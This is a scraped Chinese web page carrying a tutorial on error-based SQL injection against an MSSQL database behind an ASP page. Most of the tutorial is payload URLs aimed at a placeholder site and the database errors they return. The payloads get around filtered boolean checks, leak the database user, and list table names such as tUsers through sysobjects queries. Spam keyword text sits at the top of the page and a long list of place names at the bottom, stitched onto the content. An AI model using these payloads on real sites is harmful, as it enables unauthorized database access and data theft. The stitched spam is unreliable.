人人做人人澡人人爽欧美,国产主播一区二区,久久久精品五月天,羞羞视频在线观看免费

當(dāng)前位置:蘿卜系統(tǒng) > 網(wǎng)絡(luò)技術(shù)教程 > 詳細(xì)頁面

靈活地運(yùn)用SQL Injection做數(shù)據(jù)庫滲透

靈活地運(yùn)用SQL Injection做數(shù)據(jù)庫滲透

更新時(shí)間:2021-01-31 文章作者:未知 信息來源:網(wǎng)絡(luò) 閱讀次數(shù):

網(wǎng)絡(luò)技術(shù)是從1990年代中期發(fā)展起來的新技術(shù),它把互聯(lián)網(wǎng)上分散的資源融為有機(jī)整體,實(shí)現(xiàn)資源的全面共享和有機(jī)協(xié)作,使人們能夠透明地使用資源的整體能力并按需獲取信息。資源包括高性能計(jì)算機(jī)、存儲(chǔ)資源、數(shù)據(jù)資源、信息資源、知識(shí)資源、專家資源、大型數(shù)據(jù)庫、網(wǎng)絡(luò)、傳感器等。 當(dāng)前的互聯(lián)網(wǎng)只限于信息共享,網(wǎng)絡(luò)則被認(rèn)為是互聯(lián)網(wǎng)發(fā)展的第三階段。
    對(duì)于很多的MSSQL數(shù)據(jù)庫,要進(jìn)行注入需要靈活的技巧與思路,就有如在第一篇文章里所提到的邏輯判斷法。 有時(shí)候,一個(gè)注入點(diǎn)的判斷不是單純靠and 1=1和and 1=2的,就有如這網(wǎng)站:

http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25

加個(gè)" ' "符號(hào)在后面,

http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'

出錯(cuò)信息如下,

Unclosed quotation mark before the character string 'M10-25''

好,應(yīng)該是注入點(diǎn)了,再試and 1=1,

http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'%20and%20'1'='1

是正常畫面,再試and 1=2,

http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'%20and%20'1'='2

還是正常畫面,看來是邏輯判斷被過濾了,是不是不能注入了呢?然而,邏輯判斷能被過濾,執(zhí)行錯(cuò)誤可不能被過濾。在unclosed quotation mark的前提下,我們先讓它出錯(cuò),然后再加個(gè)邏輯判斷給它過濾和關(guān)掉那個(gè)" ' "符號(hào)。好,思路是這樣,就提交這樣的語句:

http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'%20and%20user>0%20and%20'1'='1

出錯(cuò)信息如下,

Syntax error converting the nvarchar value 'dbo' to a column of data type int

看到吧,成功了。所以下次當(dāng)邏輯判斷被過濾了,就利用它再結(jié)合執(zhí)行錯(cuò)誤來進(jìn)行注入好了。
再試這語句,

http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'%20and%20(select%20top%201%20name%20from%20(select%20top%201%20name%20from%20sysobjects%20where%20xtype='U'%20order%20by%20name%20desc)%20a%20order%20by%20name)>0%20and%20'1'='1

出錯(cuò)信息是,

Syntax error converting the nvarchar value 'tUsers' to a column of data type int

好,第一個(gè)表名是'tUsers'

再來,

http://www.xxxxx.com/view_topic.asp?MainTopicID=M10-1&TopicID=M10-25'%20and%20(select%20top%201%20name%20from%20(select%20top%202%20name%20from%20sysobjects%20where%20xtype='U'%20order%20by%20name%20desc)%20a%20order%20by%20name)>0%20and%20'1'='1

這次的出錯(cuò)信息是,

Syntax error converting the nvarchar value 'tTechnical' to a column of data type int

第二個(gè)表名是'tTechnical'

好了,就試到這里為止。共勉之。


網(wǎng)絡(luò)的神奇作用吸引著越來越多的用戶加入其中,正因如此,網(wǎng)絡(luò)的承受能力也面臨著越來越嚴(yán)峻的考驗(yàn)―從硬件上、軟件上、所用標(biāo)準(zhǔn)上......,各項(xiàng)技術(shù)都需要適時(shí)應(yīng)勢(shì),對(duì)應(yīng)發(fā)展,這正是網(wǎng)絡(luò)迅速走向進(jìn)步的催化劑。

溫馨提示:喜歡本站的話,請(qǐng)收藏一下本站!

本類教程下載

系統(tǒng)下載排行

網(wǎng)站地圖xml | 網(wǎng)站地圖html
主站蜘蛛池模板: 从化市| 玛纳斯县| 安吉县| 佛山市| 手游| 饶河县| 咸阳市| 南皮县| 德清县| 昭通市| 始兴县| 霸州市| 永德县| 博白县| 闽清县| 临西县| 乌兰县| 蒙城县| 新和县| 淅川县| 正镶白旗| 洪雅县| 临城县| 新余市| 宁远县| 天长市| 遵义市| 永嘉县| 织金县| 周至县| 赣榆县| 辉县市| 油尖旺区| 兴化市| 铅山县| 佛冈县| 普安县| 长汀县| 垣曲县| 印江| 瑞安市|